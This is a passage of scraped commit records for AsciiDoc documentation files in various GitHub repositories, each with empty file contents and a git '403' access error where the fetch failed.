implicit provisioning doc but with a few\nfile names changed as necessary.\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr","old_file":"docs\/hsm-provisioning.adoc","new_file":"docs\/hsm-provisioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"4031c8f26f8cc244e362c088597c54ff759dbb88","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-reporter-es","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-reporter-es.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81ccbb2f425e7d13e855676a1078f8e35b93d70b","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c16244683a80733a925df16f97110204f2277adf","subject":"Added release notes for 2.13.0.Final","message":"Added release notes for 2.13.0.Final\n","repos":"agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,forge\/docs","old_file":"news\/2014-12-15-forge-2.13.0.final.asciidoc","new_file":"news\/2014-12-15-forge-2.13.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"10f547bceec23c3e0155964a7532ee026f9d653b","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a3baa99e6bdf821d973725c81e82e714f3438f6","subject":"Update 2016-06-18-Euro-Watching-Engineering.adoc","message":"Update 2016-06-18-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-18-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef246e850fa206133b668ef3a3773ac4f1309e6d","subject":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","message":"Update 2016-11-02-Episode-77-Bust-your-Bone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_file":"_posts\/2016-11-02-Episode-77-Bust-your-Bone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7003515007629a12539d16008b1e28f6c18170","subject":"created v1 of the installation\/config guide","message":"created v1 of the installation\/config guide\n","repos":"msavy\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman-guides,apiman\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,ssogabe\/apiman-guides,msavy\/apiman-guides,apiman\/apiman,apiman\/apiman","old_file":"installation-guide\/en-US\/Guide.asciidoc","new_file":"installation-guide\/en-US\/Guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05ece56ccfb9318e7fb2ab29e5286f2c6d4f73fe","subject":"- introduction to arduino workshop initial commit","message":"- introduction to arduino workshop initial commit\n","repos":"davidkirwan\/workshops,semkr\/workshops,davidkirwan\/workshops,semkr\/workshops","old_file":"introduction_to_arduino\/README.asciidoc","new_file":"introduction_to_arduino\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"138590133e6b2ed6c9ca8040a77578821a23de6f","subject":"Contributing guide updated.","message":"Contributing guide updated.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f76eb82f981bbd39c65b9abdab5b7435dfe3bba","subject":"doc(CONTRIBUTORS): added a CONTRIBUTORS.adoc file","message":"doc(CONTRIBUTORS): added a CONTRIBUTORS.adoc file\n","repos":"michelangelo13\/ccw,laurentpetit\/ccw,laurentpetit\/ccw,noncom\/ccw,noncom\/ccw,ccw-ide\/ccw,laurentpetit\/ccw,ccw-ide\/ccw,michelangelo13\/ccw,michelangelo13\/ccw,noncom\/ccw,ccw-ide\/ccw","old_file":"CONTRIBUTORS.adoc","new_file":"CONTRIBUTORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noncom\/ccw.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"59933db79d30a9619ae5e390875c1bf49932ed86","subject":"README","message":"README\n","repos":"vencik\/algorithm,vencik\/algorithm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vencik\/algorithm.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"64af3ab5a44dd3555a150686cccc5afdc1d36c21","subject":"[examples] add readme to webserver example","message":"[examples] add readme to webserver example\n","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"examples\/webserver\/README.adoc","new_file":"examples\/webserver\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoogleContainerTools\/skaffold.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"508340ce60d1317b149fe612ea70c3c5eb824f79","subject":"Update 2015-09-04-Turing-Machine.adoc","message":"Update 2015-09-04-Turing-Machine.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"101739c7bec60a6d5cf9172fcb0714819a5c7b53","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba3eb37f8beb321d11452d8c1a7297347a9ed054","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdfa2b75035d32a2be2b0ed55267d1409962733","subject":"Explicitly load library with Quicklisp","message":"Explicitly load library with Quicklisp\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6dc8ec1c9b19e7e40c4b2d53b5d50d23c33e32be","subject":"Update 2016-03-13-Debugging-mesos-with-sysdig.adoc","message":"Update 2016-03-13-Debugging-mesos-with-sysdig.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-13-Debugging-mesos-with-sysdig.adoc","new_file":"_posts\/2016-03-13-Debugging-mesos-with-sysdig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05a34ce97de49301b4a1dcb7c5931897d6dab0d1","subject":"adds sample of emoji","message":"adds sample of emoji\n","repos":"taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab,taky\/asciidoctor-extensions-lab","old_file":"lib\/emoji-inline-macro\/emoji.adoc","new_file":"lib\/emoji-inline-macro\/emoji.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/taky\/asciidoctor-extensions-lab.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40585e7b37e20b1507a1721577f54e2ec60a46c1","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60573e4ec5e5bccb1b33871ca06bc130d5a0ca6c","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d80925407ab9453c0b0eaa540b35abab722ae4cf","subject":"Update 2016-12-14-Autonomous-Cars.adoc","message":"Update 2016-12-14-Autonomous-Cars.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-12-14-Autonomous-Cars.adoc","new_file":"_posts\/2016-12-14-Autonomous-Cars.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cdf9d78e9b85dc6f47ce34e0e1fd63e3f430336","subject":"adding --parallel for pulling images","message":"adding --parallel for pulling images\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9faafea74af52c93e0a3b2517eadfbfba6980f2e","subject":"fix https:\/\/github.com\/docker\/labs\/issues\/241","message":"fix https:\/\/github.com\/docker\/labs\/issues\/241\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54125db43b942be713c3be961dfa3ecb203bff84","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-karma\/README.adoc","new_file":"plugins\/boteco-plugin-karma\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97edced06be3ed495f1b07928944ea60e6b3338b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3260c9bcebc3e5d5da940a849c73d94248b49046","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b4bdfd8e8bc191b043153d1a6e1431c1cb9e00b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f94c335f574c4402e038c388cb2ddaa5da2c7368","subject":"Deleted 2015-5-10-uGUI.adoc","message":"Deleted 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0d7a4421713568efda8dbbda33a53594a23b8e","subject":"Updated docs","message":"Updated docs\n","repos":"k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa0f1c6e60881c3d356412db2d1082799cd9f1d4","subject":"Remove cmake installation requirement from README","message":"Remove cmake installation requirement from README\n\nThis has been in thirdparty for a long time.\n\nChange-Id: Ib2ab0b07abf2a351dc7d1c8fa696d1ce0678ba5d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/932\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5c06c3c036b69eab8d60f7aa667075efeb5a557","subject":"add asciidoc link for readme","message":"add asciidoc link for readme\n","repos":"Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,ato\/yubico-piv-tool","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"87018a4d5bd992e5b19f88d7695790ab0a7dafd6","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"0c502e96d4a9dc2cce5a8caabac8b89e9b0df69e","subject":"CL note - get cwd with UIOP","message":"CL note - get cwd with UIOP\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"094bdd131bf1c32c0fd8c0e8ddb5ec572bc7cd76","subject":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","message":"Update 2016-09-30-shortcutkey-taiouhyou.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_file":"_posts\/2016-09-30-shortcutkey-taiouhyou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93a76847483d028eaefef173e1ab10bbaccd5218","subject":"Update 2017-02-21-dream-and-salted-fish.adoc","message":"Update 2017-02-21-dream-and-salted-fish.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21-dream-and-salted-fish.adoc","new_file":"_posts\/2017-02-21-dream-and-salted-fish.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b126df7d14fee6610068c8db98af06504429f046","subject":"added continuousIntegration.adoc","message":"added continuousIntegration.adoc\n","repos":"droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website","old_file":"code\/continuousIntegration.adoc","new_file":"code\/continuousIntegration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/jbpm-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a74cc4cbc500c5b3464c26e132035c4dc9ad7f7","subject":"fix bucketDuration example, round 2","message":"fix bucketDuration example, round 2\n","repos":"lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aaa6e1af2eb4de7c8cfafcc65224fbe5428c14c","subject":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","message":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac2a07b94b3c25359f639a0ee33429940d218b51","subject":"Job: #12048 Add note","message":"Job: #12048 Add note\n","repos":"lwriemen\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,rmulvey\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc","old_file":"doc\/notes\/12048_unique_domains_in_set.int.adoc","new_file":"doc\/notes\/12048_unique_domains_in_set.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c038a39b9f709df0c0fb810722386438ee83a4a","subject":"[DOCS] Improved readability of multi-match query docs","message":"[DOCS] Improved readability of multi-match query docs\n","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch","old_file":"docs\/reference\/query-dsl\/queries\/multi-match-query.asciidoc","new_file":"docs\/reference\/query-dsl\/queries\/multi-match-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparo\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4e663cdcdd7197c7078c8216afd2baccbd54e6a","subject":"wikipedia elements we are interested in","message":"wikipedia elements we are interested in\n","repos":"neo4art\/neo4art,MZaratin-Larus\/neo4art,nico-Fritz\/neo4art,nico-Fritz\/neo4art,MZaratin-Larus\/neo4art,neo4art\/neo4art,neo4art\/neo4art,neo4art\/neo4art,MZaratin-Larus\/neo4art,MZaratin-Larus\/neo4art,MZaratin-Larus\/neo4art,nico-Fritz\/neo4art,nico-Fritz\/neo4art,neo4art\/neo4art,nico-Fritz\/neo4art,nico-Fritz\/neo4art,neo4art\/neo4art,MZaratin-Larus\/neo4art","old_file":"neo4art-wikipedia-importer\/wikipedia-elements.adoc","new_file":"neo4art-wikipedia-importer\/wikipedia-elements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nico-Fritz\/neo4art.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57c43ac9975b35392e1226e587ded86ed8437df6","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c84352cf76a4975d8d613321ee5145dca254b66","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 